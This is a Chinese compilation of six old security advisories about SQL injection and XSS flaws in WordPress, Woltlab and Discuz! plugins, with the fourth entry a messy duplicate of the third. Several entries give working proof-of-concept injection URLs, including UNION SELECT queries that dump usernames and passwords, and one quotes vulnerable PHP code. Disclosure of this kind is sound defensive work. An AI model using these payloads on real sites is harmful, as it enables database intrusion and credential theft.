下面小编为大家带来流行WordPress SEO插件曝高危SQL注入漏洞,本文共6篇,希望大家喜欢!本文原稿由网友“MarineCorps”提供。
篇1:流行WordPress SEO插件曝高危SQL注入漏洞
最新消息,全球最流行的CMS应用WordPress插件WordPress SEO by Yoast曝高危SQL注入漏洞,该插件使用频率相当高,用户高达可达千万,
漏洞简述
WordPress SEO by Yoast插件是WordPress平台下非常流行的SEO插件,看其在Yoast网站上高达1400万次的下载量就知道了。
该漏洞是WordPress漏洞扫描器“WPScan”开发者Ryan Dewhurst发现——1.7.3.3之前版本的WordPress SEO by Yoast都会受到SQL盲注web应用程序漏洞的影响。SQL注入漏洞之所以被标记为高危漏洞,是因为它可能会导致大量数据和敏感信息泄露。通常,在SQL注入攻击中,攻击者会通过客户端在应用程序中输入一个畸形的SQL请求。
攻击详情
该漏洞仅影响WordPress内部用户,因为该漏洞存在于admin/class-bulk-editor-list-table.php文件中,而此文件只有WordPress管理员、编辑和特权作者才能访问,
为了成功利用这一漏洞,攻击者需要从授权用户(管理员、编辑、作者)处利用该漏洞。当然授权用户是不会乖乖帮你攻击东家的,这就需要社会工程学的帮助了,攻击者可以欺骗用户进入一个精心编写的URL中,如果授权用户成为了此次攻击的受害者,那么攻击者就可利用此漏洞在受害者的WordPress网站上执行任意SQL请求。
漏洞利用POC
Ryan提供了一个SQL盲注漏洞的poc:
victim-wordpress-website.com/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
修复补丁
1.7.4版本的WordPress SEO by Yoast(最新版)已经修复了该漏洞,顺便还修复了其中的CSRF漏洞。
最新版本的WordPress已经废除了自动更新插件的功能,建议用户尽快手动更新WordPress SEO by Yoast。
篇2:WordPress Photoracer插件id参数SQL注入漏洞
l kid's blog
添加时间:
-06-19
系统编号:
WAVDB-01445
BUGTRAQ: 35382
影响版本:
Photoracer 1.0
程序介绍:
Photoracer是一个Wordpress论坛插件,允许从管理面板创建照片竞赛,
漏洞分析:
Photoracer插件的wp-content/plugins/photoracer/viewimg.php页面没有正确地过滤用户所提交的id参数输入,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击,
漏洞利用:
site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user,6,7,8--
解决方案:
厂商补丁:
Paolo Palmonari
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
palmonaz.altervista.org/z/photoracer/?esohkb
信息来源:
<*来源:Kacper (kacper1964@yahoo.pl)
链接:secunia.com/advisories/35450/
篇3:WordPress WassUp插件 spy.php脚本含SQL注入漏洞
受影响系统:
WordPress WassUp 1.4 - 1.4.3
不受影响系统:
WordPress WassUp 1.4.3a
描述:
WordPress是一款免费的论坛Blog系统,
WordPress的WassUp插件存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击。
WordPress的WassUp插件中spy.php文件没有正确地验证对to_date参数的输入:
# if (isset($_GET['to_date'])) $to_date = htmlentities(strip_tags($_GET['to_date']));
# ...........
# spyview($from_date,$to_date,$rows);
#
# -In main.php
#
# function spyview ($from_date=“”,$to_date=“”,$rows=“999”) {
# ...........
# $qryC = $wpdb->get_results(“SELECT id, wassup_id, max(timestamp) as max_timestamp, ip, hostname, searchengine,
# urlrequested, agent, referrer, spider, username, comment_author FROM $table_name WHERE timestamp BETWEEN $from_date AND
# $to_date GROUP BY id ORDER BY max_timestamp DESC”);
这允许远程攻击者通过注入任意SQL代码控制SQL查询,
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
wordpress.org/
篇4:WordPress WassUp插件 spy.php脚本含SQL注入漏洞
受影响系统:WordPress WassUp 1.4 - 1.4.3不受影响系统:WordPress WassUp 1.4.3a描述:WordPress是一款免费的论坛Blog系统,WordPress的WassUp插件存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击。WordPress的WassUp插件中spy.php
受影响系统:WordPress WassUp 1.4 - 1.4.3不受影响系统:
WordPress WassUp 1.4.3a描述:
WordPress是一款免费的论坛Blog系统。WordPress的WassUp插件存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击。WordPress的WassUp插件中spy.php文件没有正确地验证对to_date参数的输入:# if (isset($_GET['to_date'])) $to_date = htmlentities(strip_tags($_GET['to_date']));
# ...........
# spyview($from_date,$to_date,$rows);
#
# -In main.php
#
#function spyview ($from_date=“”,$to_date=“”,$rows=“999”) {
#...........
#$qryC = $wpdb->get_results(“SELECT id, wassup_id, max(timestamp) as max_timestamp, ip, hostname, searchengine,
# urlrequested, agent, referrer, spider, username, comment_author FROM $table_name WHERE timestamp BETWEEN $from_date AND
# $to_date GROUP BY id ORDER BY max_timestamp DESC”); 这允许远程攻击者通过注入任意SQL代码控制SQL查询,
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:wordpress.org/
篇5:Woltlab Burning Board 2.3.6 插件SQL注入漏洞漏洞预警
Woltlab Burning Board是一款由PHP编写,MySQL后台支持的WEB论坛程序,Woltlab Burning Board 2.3.6中的hilfsmittel.php插件存在SQL注入漏洞,可能导致敏感信息泄露。
[+]info:
~~~~~~~~~
Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability
[+] Autor: Crazyball
[+] Vulnerabilities [ SQL Injection ]
[+] Page: www.euweb.at/
[+] Language: [ PHP ]
[+] Version: Hilfsmitteldatenbank 1.0
[+] Date: n/a
[+] Vendor: www.woltlab.com/de/
[+]poc:
~~~~~~~~~
[host]/[path]/hilfsmittel.php?action=read&katid=5'/**/UNION/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10/**/FROM/**/bb1_users/*
[+]Reference:
~~~~~~~~~
www.exploit-db.com/exploits/16202
篇6:Discuz! 7.2/X1 心情墙插件SQL注入及持久型XSS漏洞分析和修复
简要描述:
Discuz! 7.2/X1 心情墙插件SQL注入及持久型XSS漏洞,
SQL注入比较鸡肋,要求GPC为off(目前这样的网站几乎绝版了)
XSS因为是持久型的,只要管理员打开此应用即会触发。利用XSS怎么操作就见仁见智了。
详细说明:
由Discuz!认证的(addons.discuz.com/workroom.php)第三方开发团队“潮流少年工作室 Teen Studio”出品的心情墙插件(www.discuz.net/forum.php?mod=viewthread&tid=1632898),因变量未初始化及过滤不严导致SQL注入及跨站脚本漏洞。
moodwall.inc.php
SQL注入,除下面代码这一处外,本文件还有很多处这样的或是$_POST得到后直接用的情况。惨不忍睹。
elseif($action == 'edit_mood' && moodid) {
//moodid未初始化,直接代入sql查询
$check = $db->result_first(“SELECT * FROM {$tablepre}moodwall WHERE id='$moodid' AND uid='$discuz_uid'”);
if(!$check !$moodid) {
showmessage('moodwall:moodwall_inc_php_2', 'plugin.php?id=moodwall&action=user_mood');
}
$sql = “SELECT * FROM {$tablepre}moodwall WHERE id='$moodid'”;
$query = $db->query($sql);
$moodlist_edit = array();
while($mood_edit = $db->fetch_array($query)) {
$moodlist_edit[] = $mood_edit;
}
XSS
$uid=$_POST[uid];
$username=$_POST[username];
$bgpic=$_POST[bgpic];
$mood=$_POST[mood];
$message=$_POST[message];
$dateline=time();
//$_POST得到数据直接入库,前端出库代码也没有做过滤,这里就不贴了,
$db->query(“INSERT INTO {$tablepre}moodwall (uid,username, bgpic, mood, message, dateline) VALUES ('$uid', '$username', '$bgpic', '$mood', '$message', '$dateline')”);
漏洞证明:
随意找一个安装此应用的网站:
/plugin.php?id=moodwall&action=edit_mood&moodid=2'
发表心情处直接插入html代码
\">
修复方案:
过滤啊过滤,初始化啊初始化。
强烈建议Discuz!团队对第三方的应用做严格的审查后再在自己的官方论坛上发布。Discuz!败在插件上也不是一次两次了
南方数据网站管理系统注入漏洞&后台拿WebShell漏洞预警